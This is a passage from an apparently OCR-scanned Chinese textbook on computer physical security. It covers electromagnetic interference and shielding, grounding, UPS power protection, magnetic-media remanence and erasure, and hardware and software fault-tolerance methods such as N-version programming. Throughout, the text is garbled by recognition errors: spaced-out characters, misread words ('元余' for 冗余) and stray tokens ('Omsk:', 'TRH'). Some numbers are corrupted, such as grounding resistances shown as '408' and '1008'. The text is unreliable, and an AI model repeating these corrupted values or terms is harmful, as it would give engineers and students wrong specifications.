严重 影响 计算 机 设备 安全 和 系统 稳定 及 可 靠 性 。 

(2) 开关 冲击 

大 功率 开关 、 继 电器 、 点 焊 机 、 交 直流 整流 子 开关 的 通 断 ， 都 会 使 电流 发 生 急 剧变 
化 ， 产 生 脉 冲 式 干扰 。 另 外 ， 机 房 内 的 其 他 设备 ， 如 日 光 灯 、 吸 尘 器 手电 钻 等 也 都 能 产 
生 了 瞬时 干扰 。 这 些 冲 击 干扰 电流 ， 不 仅 含有 丰富 的 谐 波 ， 容 易 产生 感应 电磁 场 ， 而 且 干 
扰 电 平 很 大 ， 会 损坏 计算 机 器 件 和 造成 计算 机 信息 出 错 。 

(3) 放电 现象 

电器 设备 中 各 种 放电 现象 ， 如 火花 放电 、 辉 光 放 电 、 弧 光 放 电 、 电 尝 放 电 都 会 产生 
高 频 辐射 , 使 计算 机 发 生 电 压 电 流 冲击 , 尤其 是 弧 光 和 火花 放电 对 计算 机 设备 非常 有 害 。 

(4) 射频 干扰 

空间 的 各 种 无 线 发 射 、 广 播 、 电 视 、 雷 达 、 高 频 加 热 、 焊 接 、 淳 火 、 短 波 理疗 等 电 
子 设备 的 电磁 场 ， 会 通过 电磁 波 辐射 对 计算 机 造成 干扰 。 严 重 影响 计算 机 的 可 靠 性 和 安 
全 性 。 使 计算 机 及 其 磁 记 录 设 备 中 的 信息 出 错 或 缺失 ， 使 计算 机 系统 无 法 正常 工作 。 

除了 工业 干扰 之 外 ， 还 有 自然 干扰 。 

@ 雷 电 干 扰 : 这 是 自然 界 产 生 的 弧 光 放电 现象 ， 其 感应 产生 电压 可 达 10kV 以 上 ， 
而 且 电 流 强度 很 大 ， 严 重 威胁 计算 机 设备 安全 。 

@ 宇 宙 干 扰 : 宇宙 干扰 就 是 指 地 球 以 外 的 能 源 干扰 ， 包 括 太阳 能 产生 的 无 线 辐 射 。 

@ 电 磁 脉 冲 : 这 里 是 指 地 球 内 部 核 爆 炸 产生 的 电磁 脉冲 ， 它 以 电磁 辐射 的 形式 穿 透 
计算 机 的 防护 层 ， 或 通过 计算 机 的 各 种 孔 口 进入 计算 机 ， 感 应 出 电压 和 电流 ， 干 扰 计 算 
机 正常 运行 。 

@ 大 气 放 电 : 这 些 自 然 干扰 会 产生 随机 电流 ， 轻 则 增加 电 品 声 干扰 ， 使 计算 机 信息 
出 错 ， 否 则 使 计算 机 元 器 件 击 穿 ， 使 计算 机 设备 损坏 。 

Omsk: 静电 危害 是 计算 机 、 半 导体 器 件 的 “大 敌 ” 是 造成 微机 半导体 损坏 
的 主要 原因 。 静 电 干扰 不 仅 使 磁 记 录 破 坏 ， 还 会 使 计算 机 设备 外 壳 产 生 感应 。 MOS 器 件 
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的 电容 性 结构 和 高 绝缘 性 能 ， 使 得 即使 有 很 小 的 电量 也 会 感应 出 很 高 的 静电 电压 ， 使 
MOS 器 件 栅 介 质 击 穿 。 当 人 在 绝缘 性 能 良好 的 地 毯 或 木质 地 板 上 走动 时 ， 尼 龙 、 丝 绸 工 
作 服 会 被 静电 充电 , 行走 前 后 两 步 之 间 同 时 又 会 放电 , 因此 会 产生 几 十 千 伏 的 静电 电压 ， 
使 计算 机 损坏 。 

电磁 干扰 严重 影响 了 计算 机 系统 的 安全 性 ， 因 此 必须 采用 合适 的 方法 进行 避免 ， 常 
用 的 方法 有 : 

O 电容 滤波 : 在 一 定 的 通 频带 内 ， 滤 波 器 衰减 很 小 ， 电 能 很 容易 通过 ， 而 在 此 通 
频带 外 衰减 则 很 大 ， 能 有 效 地 抑制 传输 。 因 此 ， 对 于 不 需要 的 干扰 信号 ， 可 采用 不 同形 
式 的 滤波 器 进行 抑制 。 

滤波 器 有 电容 滤波 器 、 电 感 滤波 器 等 多 种 结构 形式 ， 可 根据 不 同 需要 灵活 运用 、 对 
于 供电 系统 的 噪声 耦合 ， 可 采用 感 容 或 阻 容 滤波 器 把 计算 机 电路 与 电源 阻隔 ， 以 消除 干 
扰 源 与 计算 机 之 间 的 耦合 ， 抑 制 噪声 进 入 计算 机 电路 。 对 于 脉冲 干扰 ， 可 采用 组 合 抑制 
方法 。 对 于 放电 干扰 ， 可 在 开关 电路 端 线 与 计算 机 设备 之 间 加 0.25-1pf 的 电容 滤波 器 来 
抑制 。 对 于 地 环 路 ， 还 可 以 来 用 隔离 变压器 、 光 电 耦 合 器 等 措施 来 阻隔 地 环 路 ， 切 断 地 
环 路 电流 ， 抑 制 地 环 路 干扰 。 

© 电磁 屏蔽 : 在 计算 机 工程 中 ， 凡 是 受 电磁 场 干 扰 的 地 方 ， 都 可 以 用 屏蔽 的 办 法 
来 削弱 干扰 ， 以 确保 计算 机 正常 运行 ， 对 于 不 同 的 干扰 场 ， 要 采取 不 同 的 屏蔽 方法 ， 如 
电 屏 蔽 、 磁 屏蔽 或 电磁 屏蔽 ， 并 将 屏蔽 体 良好 接地 。 

对 于 电磁 辐射 , 要 采用 导电 材料 屏蔽 单 把 计算 机 电路 包围 起 来 , 并 将 金属 外 过 接地 ， 
这 样 可 以 将 杂 散 电容 〈 分 布 电容 ) 切断 ， 并 将 干扰 信号 引入 大 地 。 在 计算 机 内 部 ， 常 采 
用 将 地 线 置 于 插件 电路 外 围 ， 并 用 地 线 或 接地 平面 将 各 级 电路 隔 开 ， 以 有 效 地 消除 各 电 
路 之 间 、 各 插件 之 间 的 分 布 电容 耦合 进来 的 干扰 。 

在 磁场 耦合 时 ， 对 低频 磁场 采用 铁 等 高 导 磁 率 材料 做 屏蔽 单 ， 利 用 它 对 干扰 进行 分 
流 和 短路 ， 使 通过 空气 的 磁 通 大 大 减 小 ， 削 弱 干 扰 源 ， 减 小 计算 机 电路 对 干扰 的 接收 。 
对 于 高 频 磁场 ， 可 采用 铝 等 低 电阻 率 的 导体 材料 做 屏蔽 曾 ， 利 用 屏蔽 过 表面 产生 的 涡流 
反 磁 场 来 排斥 、 抵 消 干扰 场 ， 以 削弱 和 抑制 磁场 干扰 。 

对 电磁 感应 耦合 ， 可 采用 电 屏 蔽 和 磁 屏 蔽 相 结合 的 方法 抑制 电磁 辐射 干扰 。 

@ 接地 系统 : 采用 接地 系统 ， 一 是 可 以 消除 各 电路 之 间 流 经 公共 阻抗 时 所 产生 的 
共 阻 抗 干扰 ， 避 免 计 算 机 电路 受 磁场 和 电位 差 的 影响 ， 二 是 可 保证 设备 及 人 身 安全 、 对 
于 计算 机 系统 的 交流 地 、 直 流 地 、 防 雷 地 和 安全 地 ， 接 地 线 要 分 开 ， 不 要 互 连 。 进 入 计 
算 机 的 电源 线 、 信 号 线 均 要 采用 金属 屏蔽 线 或 穿 在 铁 套 管 内 ， 并 在 屏蔽 层 两 端 接地 ， 以 
防 干扰 及 雷电 入 侵 。 计 算 机 的 直流 地 采用 辐射 或 栅 格 地 较 好 。 并 保证 其 接地 电阻 符合 国 
家 计算 机 场地 技术 条 件 ， 即 交流 工作 地 的 接地 电阻 不 大 于 408 ， 安 全 保护 地 接地 电阻 不 
应 大 于 1008 ， 直 流 地 的 接地 电阻 的 大 小 以 及 诸 地 之 间 的 关系 应 依 不 同 计算 机 系统 的 要 
求 而 定 。 
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对 于 计算 机 系统 来 说 ， 要 完全 避免 和 防止 电磁 干扰 是 不 现实 的 。 和 弄 清 电 磁 干 扰 的 原 
K, 采取 以 上 措施 往往 可 以 将 电磁 干扰 控制 在 一 定 的 范围 内 ， 以 致 不 影响 和 破坏 系统 的 
正常 工作 。 随 着 科学 技术 的 发 展 及 计算 机 的 广泛 应 用 ， 电 磁 干 扰 问 题 将 越 来 越 突出 ， 需 
要 给 予 足够 的 重视 。 为 了 抑制 电磁 干扰 ， 保 证 计算 机 系统 的 信息 的 安全 ， 我 国 已 制定 了 
国家 民用 的 EMC / EMI 标准 和 军用 EMC / EMI 标准 。 

6. 电源 保护 

计算 机 信息 系统 设备 的 可 靠 运行 提供 能 源 保 障 ， 可 归纳 为 两 个 方面 : 对 工作 电源 的 
工作 连续 性 的 保护 〈 如 使 用 不 间断 电源 ) 和 对 工作 电源 的 工作 稳定 性 的 保护 。 

电源 电压 波动 或 负载 幅度 变 比 引起 的 瞬 态 电压 、 电 流 冲 击 , 会 通过 电源 进入 计算 机 ， 
不 但 会 使 计算 机 信息 出 错 ， 还 会 威胁 计算 机 及 其 器 件 的 寿命 与 安全 。 为 了 保证 计算 机 系 
统 的 稳定 性 和 安全 , 供电 电源 最 好 不 要 与 大 用 户 合用 一 个 电源 变压器 。 在 允许 的 情况 下 ， 
可 以 考虑 采用 独立 的 变压器 ， 对 于 大 小 型 计算 机 系统 还 可 以 采用 中 频 发 电机 组 供电 ， 然 
后 再 经 过 交流 稳 压 器 和 低 通 滤波 器 送 给 直流 稳 压 器 。 

目前 应 用 的 UPS 电源 是 一 种 比较 理想 的 供电 设备 , 它 可 以 对 付 各 种 突 发 脉冲 、 瞬 变 、 
噪声 和 电源 电压 降低 及 停电 。UPS 电源 可 以 在 没有 外 电 输 入 情况 下 独立 支持 计算 机 系统 
工作 半 小 时 以 上 。 在 电网 电 风波 动 较 大 而 系统 电源 又 要 求 较 高 时 ， 应 考虑 选用 一 定 容量 
的 UPS 电源 。 可 以 兼顾 供电 、 接 地 、 避 雷 的 电磁 兼容 系统 。 
4.1.4.3 ”介质 安全 

介质 安全 是 指 介质 数据 和 介质 本 身 的 安全 。 

介质 安全 目的 是 保护 存储 在 介质 上 的 信息 。 包 括 介质 的 防盗 ;介质 的 防 毁 ， 如 防 霉 
Alli HM. 

介质 数据 的 安全 是 指 对 介质 数据 的 保护 。 介 质数 据 的 安全 删除 和 介质 的 安全 销毁 是 
为 了 防止 被 删除 或 销毁 的 敏感 数据 被 他 人 恢复 。 包 括 介质 数据 的 防盗 〈《 如 防止 介质 数据 
被 非法 复制 ); 介质 数据 的 销毁 ,包括 介质 的 物理 销毁 〈 如 介质 粉碎 等 ) 和 介质 数据 的 彻 
底 销 毁 〈 如 消 磁 等 )， 防 止 介质 数据 删除 或 销毁 后 被 他 人 恢复 而 泄露 信息 ; 介质 数据 的 防 
毁 ， 防 止 意外 或 故意 的 破坏 使 介质 数据 丢失 。 

计算 机 磁盘 是 常用 的 计算 机 信息 载体 。 计 算 机 磁盘 属于 磁 介 质 ， 所 有 了 磁 介 质 都 存在 
剩 磁 效 应 的 问题 ， 保 存在 磁 介质 中 的 信息 会 使 磁 介 质 不同 程 度 地 永久 性 磁化 ， 所 以 磁 介 
质 上 记载 的 信息 在 一 定 程度 上 是 抹 除 不 净 的 ， 使 用 高 灵敏 度 的 磁头 和 放大 器 可 以 将 已 抹 
除 信息 的 磁盘 上 的 原 有 信息 提取 出 来 。 据 有 关 资 料 介绍 , 即使 磁盘 已 改写 了 12 次 , 但 第 
一 次 写 入 的 信息 仍 有 可 能 复制 出 来 。 这 使 涉 密 和 重要 磁 介 质 的 管理 、 废 弃 成 为 很 重要 的 
问题 。 有 的 国家 甚至 规定 记录 绝密 信息 资料 的 磁盘 只 准 使 用 一 次 ， 不 用 时 就 必须 销毁 ， 
不 准 抹 后 重 录 。 

磁盘 是 用 于 复制 和 存储 文件 的 ， 它 常 被 重新 使 用 ， 有 时 要 删除 其 中 某 些 文件 ， 有 时 
又 要 复制 一 些 文件 进去 。 在 许多 计算 机 操作 系统 中 , 用 DEL 命令 删除 一 个 文件 , 仅仅 是 
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删除 了 该 文件 指针 ， 也 就 是 删除 了 该 文件 的 标记 ， 释 放 了 该 文件 的 存储 空间 ， 而 并 非 真 
正 将 该 文件 删除 或 覆盖 。 在 该 文件 的 存储 空间 未 被 其 他 文件 覆盖 之 前 ， 该 文件 仍然 原封 
不 动 地 保存 于 磁盘 之 上 ， 计 算 机 删除 磁盘 文件 的 这 种 方式 ， 可 提高 文件 处 理 的 速度 和 效 
率 ， 但 从 另 一 个 角度 而 言 ， 也 方便 了 被 删除 文件 的 恢复 。 

磁盘 的 安全 防护 包括 磁盘 信息 加 密 技术 和 磁盘 信息 清除 技术 。 

磁盘 信息 加 密 技 术 是 计算 机 信息 安全 保密 控制 措施 的 核心 技术 手段 ， 是 保证 信息 安 
全 保密 的 根本 措施 。 信 息 加 密 是 通过 密码 技术 的 应 用 来 实现 的 。 磁 盘 一 旦 使 用 信息 加 密 
技术 进行 加 密 ， 就 会 具有 很 高 的 保密 强度 。 磁 盘 即 使 被 窃 或 被 复制 ， 其 记载 的 信息 也 难 
以 被 读 懂 。 具 体 的 磁盘 信息 加 密 技 术 还 可 细 分 为 文件 名 加 密 、 目 录 加 密 、 程 序 加 密 、 数 
据 库 加 密 、 整 盘 数 据 加 密 等 。 具 体 应 用 可 视 磁盘 信息 的 保密 强度 要 求 而 定 。 

磁盘 信息 清除 技术 : 具体 的 清除 办 法 和 技术 有 很 多 种 ， 但 实质 上 可 分 为 直流 消 磁 法 
和 交流 消 磁 法 两 种 。 直 流 消 磁 法 是 使 用 直流 磁头 将 磁盘 上 原先 记录 信息 的 剩余 磁 通 全 部 
以 一 种 形式 的 恒定 值 来 代替 。 通 常 ， 用 完全 格式 化 方式 格式 化 磁盘 就 是 这 种 方法 。 交 流 
消 磁 法 是 使 用 交流 磁头 将 磁盘 上 原先 所 记录 信息 的 剩余 磁 通 变 得 极 小 ， 这 种 方法 的 消 磁 
效果 比 直流 消 磁 法 要 好 得 多 ， 消 磁 后 磁盘 上 的 残留 信息 强度 可 比 消 磁 前 下 降 90dB。 

近年 来 ， 数 据 存储 介质 还 出 现 了 光盘 和 FLASH 等 移动 存储 设备 。 根 据 NIST (美国 
国家 标准 技术 研究 所 ) 研究 表明 ,光盘 只 有 在 理想 条 件 下 保存 时 , 才能 达到 最 多 30 年 的 
寿命 。 理 想 条 件 是 恒温 25 摄氏 度 ， 恒 定 湿度 50%， 且 没有 光照 。NIST 综合 研究 表明 
光盘 的 正常 使 用 寿命 只 有 5 到 10 年 ， 与 U 盘 、 硬 盘 大 致 相当 。 

光盘 使 用 寿命 的 下 降 主 要 由 以 下 的 原因 造成 : 第 一 个 原因 就 是 划 伤 ， 即 使 是 轻微 的 
划 痕 也 有 可 能 破坏 用 于 反射 激光 的 反射 层 ， 而 导致 在 光盘 内 存储 的 数据 不 能 被 光驱 中 的 
光头 所 识别 ， 上 表面 划 伤 所 造成 的 损坏 比 下 表面 的 划 伤 更 甚 ;第 二 个 原因 就 是 标签 ， 粘 
贴标签 所 使 用 的 粘 合剂 中 的 溶剂 能 够 与 光盘 的 聚 碳酸 酯 表面 发 生 反 应 ， 这 会 导致 湿 气 渗 
透 过 聚 碳酸 酯 层 ， 进 而 腐蚀 银 反射 层 ， 第 三 个 原因 就 是 使 用 过 程 中 的 老化 ， 即 使 不 粘贴 
标签 也 不 划 伤 光盘 ， 由 于 激光 的 照射 都 会 导致 光盘 本 体 的 老化 变形 ， 进 而 使 得 数据 不 能 
读 取 。 

半导体 存储 器 的 发 生 的 存储 错误 大 体 上 分 为 硬 错误 和 软 错误 ， 其 中 主要 为 软 错误 。 
硬 错误 所 表现 的 现象 是 在 某 个 或 某 些 位 置 上 ， 存 取 数 据 重复 地 出 现 错误 ， 出 现 这 种 现象 
的 原因 是 一 个 或 几 个 存储 单元 出 现 故 障 。 软 错误 主要 是 由 a 粒子 引起 的 ， 存 储 器 芯片 的 
材料 中 含有 微量 放射 性 元 素 ， 它 们 会 间断 地 释放 a 粒子 。 这 些 粒子 以 相当 大 的 能 量 冲击 
存储 电容 ,改变 其 电荷 ， 从 而 引起 存储 数据 的 错误 。 引 起 软 错误 的 另 一 原因 是 噪声 干扰 。 

解决 光盘 和 半导体 存储 设备 可 靠 性 的 主要 方法 是 改善 制造 工艺 ， 严 格 使 用 环境 ， 并 
通过 纠 错 技术 解决 一 般 性 存储 错误 。 
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4.1.5 计算 机 的 可 靠 性 技术 


计算 机 的 可 靠 性 工作 ， 一 般 采 用 容错 系统 实现 。 容 错 主要 依靠 元 余 设 计 来 实现 ， 以 
增加 资源 换取 可 靠 性 。 由 于 资源 的 不 同 ， 宛 余 技术 分 为 硬件 元 余 、 软 件 元 余 、 时 间 宛 余 
和 信息 郊 余 。 可 以 是 元 器 件 级 、 部 件 级 的 、 系 统 级 的 元 余 设 计 。 在 可 靠 性 与 资源 消耗 之 
间 折 衷 、 权 衡 。 

容错 系统 工作 方式 分 为 : 

自动 侦 测 : 运行 中 自动 地 通过 专用 的 元 余 侦 测 线路 和 软件 判断 系统 运行 情况 ， 检 测 
匈 余 系 统 各 匈 余 单元 是 否 存 在 故障 。 

自动 切换 : 当 确 认 某 一 主机 出 错时 , 正常 主机 除了 保证 自身 原来 的 任务 继续 运行 外 ， 
还 接管 预先 设 定 的 后 备 作业 程序 ， 进 行 后 续 程 序 及 服务 。 

自动 恢复 : 故障 主机 被 替换 后 ， 进 行 故障 隔离 ， 离 线 故 障 修复 。 修 复 后 通过 宛 余 通 
信 线 与 正常 主机 连 线 ， 继 而 将 原来 的 工作 程序 和 磁盘 上 的 数据 自动 切换 回 修复 完成 的 主 
机 上 。 
4.1.5.1 容错 计算 的 概念 

容错 是 指 一 个 系统 在 运行 中 其 任何 一 个 子 系统 发 生 故 障 时 ， 系 统 仍然 能 够 继续 操作 
的 能 力 。 简 单 来 说 ， 就 是 发 生 灾难 性 故障 时 例如 用 户 使 用 错误 ， 电 源 故障 等 )， 容 错 系 
统 能 够 诊断 出 问题 所 在 ， 并 给 用 户 提示 问题 的 性 质 ， 保 护 用 户 的 数据 能 够 继续 操作 ， 如 
果 需 要 的 话 ， 还 可 提供 足够 的 时 间 来 适当 地 保存 文件 。 

容错 技术 是 在 一 定 程度 上 容忍 故障 的 技术 。 也 称 为 故障 掩盖 技术 fault masking)。 

容错 系统 是 采用 容错 技术 的 系统 。 

容错 主要 依靠 元 余 设计 来 实现 ， 以 增加 资源 换取 可 靠 性 。 由 于 资源 的 不 同 ， 元 余 技 
术 分 为 硬件 元 余 、 软 件 元 余 、 时 间 宛 余 和 信息 元 余 。 可 以 是 元 器 件 级 、 部 件 级 的 、 系 统 
级 的 元 余 设计 。 容 错 是 在 可 靠 性 与 资源 消耗 之 问 折 衷 、 权 衡 。 

容错 包含 下 面 两 个 目标 : 

。 数据 的 完整 性 ， 数据 保护 。 

。 数据 的 可 用 性 : 尽管 发 生 故障 ， 仍 能 读 取 数据 。 

在 一 些 像 银行 ， 航 空 ， 交 通 等 工业 部 门 ， 其 系统 必须 保持 长 年 运转 ， 不 管 在 什么 情 
况 下 ， 主 要 业务 不 能 中 断 。 因 而 早 在 几 年 以 前 就 实现 了 不 同 程度 的 容错 能 力 。 今 天 ， 随 
着 PC 数量 的 不 断 增多 和 越 来 越 多 的 商业 机 构 缩小 ， 而 把 其 主要 应 用 程序 从 大 型 机 或 小 
型 机 上 转 到 PC 上 (尤其 是 网 络 系统 ) 的 事实 ， 对 PC 机 有 某 种 形式 的 容错 能 力 的 要 求 ， 
越 来 越 强 烈 了 。 

传统 的 PC 要 求 其 子 系统 享用 公共 总 线 结 构 和 通用 存 贮 空间 , 这 就 带 来 了 一 个 问题 ， 
即 当 某 个 器 件 发 生 故 障 时， 系统 内 其 他 数据 也 受到 污染 。 作 为 这 类 硬件 系统 的 主要 操作 
系统 DOS， 遵 循 的 设计 原则 也 使 应 用 程序 和 数据 容易 受到 破坏 。 
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一 个 真正 的 容错 PC 必须 能 够 预知 并 防止 PC 运行 期 间 可 能 出 现 的 故障 , 因而 容错 系 
统 的 实现 应 该 遵守 下 列 3 个 设计 策略 : 

@ TRH: 提供 备份 子 系统 ， 即 在 大 型 机 和 小 型 机 中 已 经 使 用 了 多 年 的 传统 容错 
策略 。 

@ 预防 性 : 加 强 一 些 子 系统 或 者 是 具 故 障 发 生 功 能 的 子 系统 ， 以 避免 那些 故障 

@ 恢复 性 : 保持 对 系统 的 运行 进行 记录 ， 当 发 生 故 障 时 ， 能 够 尽快 地 恢复 系统 。 

具体 的 元 余 技 术 可 以 分 为 如 下 的 4 种 : 

O 硬件 元 余 : 增加 线路 、 设 备 、 部 件 ， 形 成 备份 。 

@ 堆积 元 余 : 在 逻辑 域 可 采用 多 数 表决 方案 ， 出 现 故障 时 可 自动 恢复 。 

@ 待命 储备 元 余 : 该 系统 中 多 个 模块 ， 其 中 只 有 一 块 处 于 工作 状态 ， 其 余 块 都 处 
于 待命 接替 状态 。 当 有 一 个 模块 发 生 故 障 时 ,立刻 将 其 切除 ,并 代 之 以 无 故障 待命 模块 。 

@ 混合 元 余 : 堆积 元 余 和 待命 储备 元 余 的 结合 。 
4.1.5.2 ”硬件 容错 

计算 机 系统 的 硬件 容错 技术 主要 采取 两 个 措施 : EERE EA 
辑 处 理 部 件 ， 然 后 在 每 一 个 机 器 周期 内 ， 对 这 两 套 逻 辑 处 理 部 件 的 输出 进行 比较 。 若 相 
等 ， 说 明 工作 正常 ， 将 输出 送 总 线 ， 若 不 相等 ， 则 说 明 该 板 出 错 ， 切 断 总 线 隔离 ， 二 是 
每 一 种 模板 都 一 式 两 份 , 同时 工作 。 正 常情 况 下 两 块 模板 输出 的 结果 ,同时 送 到 总 线 上 。 
一 旦 某 一 块 模板 出 错 ， 比 较 器 比较 的 结果 不 等 ， 就 自动 将 故障 板 切 断 总 线 ， 工 作 正 常 的 
一 块 模板 的 输出 结果 继续 送 总 线 ， 这 样 就 达到 了 故障 不 停机 的 目的 。 其 具体 的 应 用 技 
术 有 : 

1. N CPU 容错 系统 

当 一 个 CPU 板 出 现 故 障 时, 另 一 个 CPU 保持 继续 运行 。 这 个 过 程 对 用 户 是 透明 的 ， 
系统 没有 受到 丝毫 影响 ， 更 不 会 引起 交易 的 丢失 ， 充 分 保证 数据 的 一 致 性 和 完整 性 。 系 
统 的 容错 结构 能 够 提供 系统 连续 运行 的 能 力 ， 任 何 单 点 故障 不 会 引起 系统 停机 ， 系 统 提 
供 在 线 的 维护 诊断 工具 可 在 应 用 继续 运转 的 情况 下 修复 单 点 故障 。 

2. 双 机 热 备份 

传统 的 高 可 靠 性 系统 采用 双 机 热 备份 方案 。 两 台 服务 器 都 处 于 热机 状态 ， 如 果 一 台 
服务 器 坏 了 ， 另 一 台 服 务 器 可 以 将 所 有 的 业务 接管 过 来 。 主 要 有 两 种 工作 方式 : 

Online 方式 : 两 台 服务 器 都 在 工作 ， 分 别 担负 不 同 的 任务 ， 均 衡 负载 。 成 本 大 ， 管 
理 难 。 

Standby 方式 : 备份 机 不 工作 ， 只 是 监测 作业 机 的 工作 状况 。 缺 点 : 服务器 之 间 切 
换 时间 较 长 。 

3. 三 机 表决 系统 

三 台 主 机 同时 运行 ， 由 表决 器 (Voter) 根据 三 台 机 器 的 运行 结果 进行 表决 ， 有 两 个 
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成 本 高 。 当 一 台 机 器 出 现 故 障 后 表决 已 失去 意义 ， 其 可 靠 性 甚至 比 不 上 一 个 双 机 系统 。 
因此 当 三 机 中 坏 掉 一 台 后 就 当 作 双 机 备份 系统 来 用 ， 不 再 进行 表决 。 

4. 集群 系统 〈Clusting) 

集群 系统 指 均衡 负载 的 双 机 或 多 机 系统 。DEC 公司 最 早 在 其 VAX 系统 上 实现 了 集 
群 技术 ， 多 服务 器 集群 系统 的 主要 目的 是 使 用 户 的 应 用 获得 更 高 的 速度 、 更 好 的 平衡 和 
通信 能 力 ， 而 不 仅仅 是 数据 可 靠 性 很 好 的 备份 系统 。 集 群 系统 对 于 金融 、 证 券 等 大 型 关 
键 业务 系统 是 最 好 选择 。 
4.1.5.3 ”软件 容错 

软件 容错 是 利用 相同 的 需求 规格 说 明 而 设计 的 不 同 版 本 通过 元 余 ， 相 互 屏蔽 各 自 内 
在 缺陷 ， 恢 复 进程 运行 ， 从 而 实现 高 可 靠 、 高 安全 性 的 系统 软件 技术 。 

使 用 这 种 技术 并 达到 上 述 要 求 的 软件 称 为 软件 容错 。 

软件 容错 本 身 有 两 层 含义 : 一 是 对 软件 自身 故障 的 处 理 ， 二 是 使 用 软件 对 系统 中 出 
现 的 其 他 故障 进行 处 理 。 目 前 的 软件 容错 技术 大 都 是 针对 软件 本 身 的 设计 故障 提出 的 ， 
但 应 用 这 些 软件 容错 思想 对 它们 有 针对 性 地 加 以 修改 后 ， 也 可 用 于 对 系统 的 硬件 故障 进 
行 处 理 。 

传统 的 软件 容错 技术 主要 使 用 “多 样 性 ”的 元 余 来 解决 软件 本 身 出 现 的 故障 ， 它 们 
的 特点 是 见 余 规模 较 大 ， 通 过 决策 机 制 给 出 结果 ; 新 的 软件 容错 技术 元 余 的 规模 较 小 ， 
决策 较为 智能 化 旦 容错 覆盖 的 范围 较 广 。 

研究 表明 ， 对 于 软件 本 身 的 设计 故障 ， 简 单 的 元 余 是 不 够 的 ， 需 要 辅 以 设计 和 数据 
表示 的 多 样 性 才能 达到 较 好 的 容错 效果 。 通 过 使 用 单 版 本 软件 技术 、 多 版 本 软件 技术 和 
多 重 数据 表达 技术 ， 可 以 保证 在 软件 自身 发 生 故 障 时 系统 仍 能 提供 稳定 可 靠 的 服务 。 单 
版 本 软件 技术 主要 用 来 探测 软件 设计 故障 ， 多 版 本 软件 技术 是 利用 功能 等 同 但 相互 独立 
的 不 同 软件 版 本 实现 容错 ; 而 多 重 数据 表达 技术 则 使 用 不 同 表达 方式 的 输入 数据 对 软件 
设计 故障 进行 容错 。 

简单 地 说 ， 设 计 多 样 性 (Design Diversity) 技术 的 核心 思想 是 : 完成 某 个 功能 有 多 
种 可 能 的 不 同方 法 , 现 将 每 种 可 能 的 方法 都 实现 (每 种 实现 称 为 一 个 变 体 )， 以 尽 可 能 保 
证 至 少 有 一 个 变 体能 可 靠 地 运行 。 

既然 每 种 变 体 的 设计 思想 各 不 相同 ， 对 于 同样 的 输入 ， 不 同 的 变 体 就 可 能 产生 不 同 
的 输出 ， 这 时 就 需要 一 种 表决 机 制 来 判断 哪 种 输出 是 正确 的 或 可 接受 的 。 依 据 表 决算 法 
的 不 同 ， 设 计 多 样 性 主要 有 三 种 经 典 的 实现 : 

(1) 恢复 块 (Recoery Blocks, RcB): 是 由 Homing 等 人 提出 并 由 Randell 最 早 实 现 
的 一 种 动态 容错 技术 ， 它 通过 建立 还 原点 并 使 用 可 接受 测试 和 后 向 恢复 实现 容错 。RcB 
的 优点 是 实现 简单 且 对 系统 无 特殊 要 求 ， 但 效率 较 低 ， 适 合用 于 处 理 简 单 事务 的 单机 系 
统 和 顺序 处 理 环境 。 
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(2) N 版 本 程序 设计 (N2Version Programming, NVP): 是 由 Elmendor 提出 并 经 
Avinienis 等 人 完善 与 实现 的 一 种 静态 容错 技术 ， 它 使 用 多 个 不 同 的 软件 版 本 利用 决策 机 
制 和 前 向 恢复 实现 容错 。 NVP 的 优点 是 实现 简单 且 效 率 较 高 , 但 不 便 用 于 顺序 处 理 环境 ， 
主要 用 于 分 布 式 环 境 中 。 

(3) N 自 检 程 序 设计 (N Self Checking Programming, NSCP): 是 Laprie 等 人 提出 的 ， 
自 检 程 序 利 用 程序 元 余 在 执行 过 程 中 检测 自身 的 行为 。NSCP 的 特点 是 容错 粒度 较为 精细 ， 

E 更 早 发 现 并 纠正 错误 ， 但 仍 不 适用 于 顺序 处 理 环境 ， 主 要 用 于 多 机 并 行 环境 中 。 

数据 多 样 性 (Data Diversity) 是 作为 对 设计 多 样 性 的 补充 由 Ammann fil Knight 提出 
的 。 数 据 多 样 性 着 眼 于 程序 的 输入 数据 ， 与 原始 输入 数据 逻辑 等 价 的 “ 重 表 达 ” 数 据 都 
可 以 作为 程序 的 新 输入 数据 。 以 不 同 表达 方式 的 输入 数据 执行 相同 的 程序 或 程序 的 变 体 
是 数据 多 样 性 技术 的 核心 思想 。 

数据 重 表达 算法 (Data Re-expression Algorithm, DRA) 用 以 获取 不 同 表 达 方 式 的 输 
入 数据 ， 其 性 能 直接 影响 着 数据 多 样 性 技术 的 容错 能 力 。 给 定 一 个 重 表达 算法 R， 它 将 
原始 输入 x 转换 为 新 的 输入 y=R(x)， 则 y 要 么 与 x 近似， 要么 以 其 他 方式 包含 x 的 所 
有 信息 。 这 时 ， 若 x 在 程序 失效 区 ， 则 需要 尽量 保证 y 在 失效 区 的 外 部 。 

作为 RcB 和 NVP 的 补充 ， 目 前 有 两 种 经 典 的 数据 多 样 性 技术 : 

(1) 重 试 块 (Retry Block, RtB): 作为 ReB 的 补充 ，RtB 也 是 一 种 动态 技术 ， 它 利 
用 重 表 达 的 数据 和 可 接受 测试 与 后 向 恢复 来 实现 容错 。 

(2) N 拷贝 程序 设计 (N-Copy Programming, NCP): 作为 NVP 的 补充 ，NCP 同样 
是 一 种 静态 技术 ， 使 用 重 表达 数据 和 决策 机 制 与 前 向 恢复 来 实现 容错 。NCP 的 容错 效果 
也 取决 于 DRA， 适 用 于 分 布 式 环境 。 

传统 的 软件 容错 技术 一 般 代价 较 高 ， 而 且 对 某 些 故障 容错 效果 并 不 明显 。 随 着 容错 
技术 研究 的 深入 ， 出 现 了 一 些 软件 容错 新 技术 。 下 面 有 代表 性 地 介绍 几 种 : 

(1) 自 适 应 N 版 本 程序 设计 (Adaptive N-VersionPro-gramming，ANVP): 本 技术 是 
对 经 典 NVP 的 改进 ， 其 核心 思想 是 通过 每 个 版 本 动态 变化 的 权 值 实现 结果 的 自 适 应 选 
举 ， 从 而 实现 元 余 的 自 清除 。 

(2) 模糊 选举 (Fuzzy Voting): 选举 用 以 从 元 余 软件 版 本 的 不 同 输出 中 获取 正确 的 
输出 。 

(3) 重 配置 与 重 恢复 (Reconfiguration and Rejuve-nation): 是 互 为 补充 的 软件 容错 
技术 。 软 件 重 配置 允许 在 动态 考虑 各 种 限制 因素 〈 如 操作 系统 服务 、 处 理 器 负载 、 可 用 
内 存 等 ) 的 情况 下 使 用 宛 余 的 资源 对 软件 进行 实时 恢复 ， 是 一 种 事件 驱动 的 即时 处 理 过 程 。 

